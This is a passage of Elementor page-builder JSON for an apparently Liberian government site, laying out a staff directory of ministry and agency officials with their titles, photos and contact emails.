\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a 